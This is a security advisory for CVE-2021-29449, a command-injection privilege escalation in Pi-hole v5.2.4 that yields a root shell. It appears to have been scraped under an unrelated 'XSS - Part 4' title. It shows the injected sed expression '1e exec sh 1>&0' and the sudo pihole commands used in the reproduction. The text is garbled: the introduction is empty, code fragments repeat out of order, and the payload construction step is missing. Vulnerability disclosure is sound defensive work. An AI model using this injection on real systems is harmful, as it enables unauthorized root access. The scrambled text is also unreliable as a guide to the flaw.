Professional Documents
Culture Documents
XSS - Part 4
XSS - Part 4
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Pi-hole [1]
# Vendor: Pi-hole
# CSNC ID: CSNC-2021-008
# CVE ID: CVE-2021-29449
# Subject: Privilege Escalation
# Risk: High
# Effect: Locally exploitable
# Author: Emanuele Barbeno <emanuele.barbeno@compass-security.com>
# Date: 20.04.2021
#
#############################################################
Introduction
------------
Affected
--------
Vulnerable:
* Pi-hole v5.2.4
Not vulnerable:
* Pi-hole v5.3
No other version was tested, but it is believed for the older versions to be
vulnerable as well.
Technical Description
---------------------
domain="${args[2]}"
target="${args[3]}"
sed -i "/cname=${domain},${target}/d" "${dnscustomcnamefile}"
main() {
args=("$@")
case "${args[1]}" in
[CUT BY COMPASS]
"addcustomdns" ) AddCustomDNSAddress;;
"removecustomdns" ) RemoveCustomDNSAddress;;
"addcustomcname" ) AddCustomCNAMERecord;;
"removecustomcname" ) RemoveCustomCNAMERecord;;
* ) helpFunc;;
esac
```
Now the sed command contains three different expressions separated by ';':
* /cname= a/d
* 1e exec sh 1>&0
* /,/d
The second expression is used to spawn a new shell using the same privileges
of the user who is running the command which, in case of sudo, is root
Add a fake entry inside the custom.list file using the pihole script:
```
$ sudo /usr/local/bin/pihole -a addcustomdns '8.8.8.8' 'google.com'
[✓] Adding custom DNS entry...
[✓] Restarting DNS server
```
Check if the fake entry has been added to the file:
```
$ cat /etc/pihole/custom.list
8.8.8.8 google.com
```
ip="${args[2]}"
host="${args[3]}"
sed -i "/${ip} ${host}/d" "${dnscustomfile}"
[CUT BY COMPASS]
main() {
args=("$@")
case "${args[1]}" in
[CUT BY COMPASS]
"addcustomdns" ) AddCustomDNSAddress;;
"removecustomdns" ) RemoveCustomDNSAddress;;
"addcustomcname" ) AddCustomCNAMERecord;;
"removecustomcname" ) RemoveCustomCNAMERecord;;
* ) helpFunc;;
Esac
```
[CUT BY COMPASS]
main() {
args=("$@")
case "${args[1]}" in
[CUT BY COMPASS]
"removestaticdhcp" ) RemoveDHCPStaticAddress;;
[CUT BY COMPASS]
esac
```
Workaround / Fix
----------------
Perform strict validation and escaping on the input provided by the user
and used to construct OS commands to avoid any kind of injection. [4]
References
----------
[1] https://pi-hole.net/
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-
wrpj
[4]
https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_C
heat_Sheet.html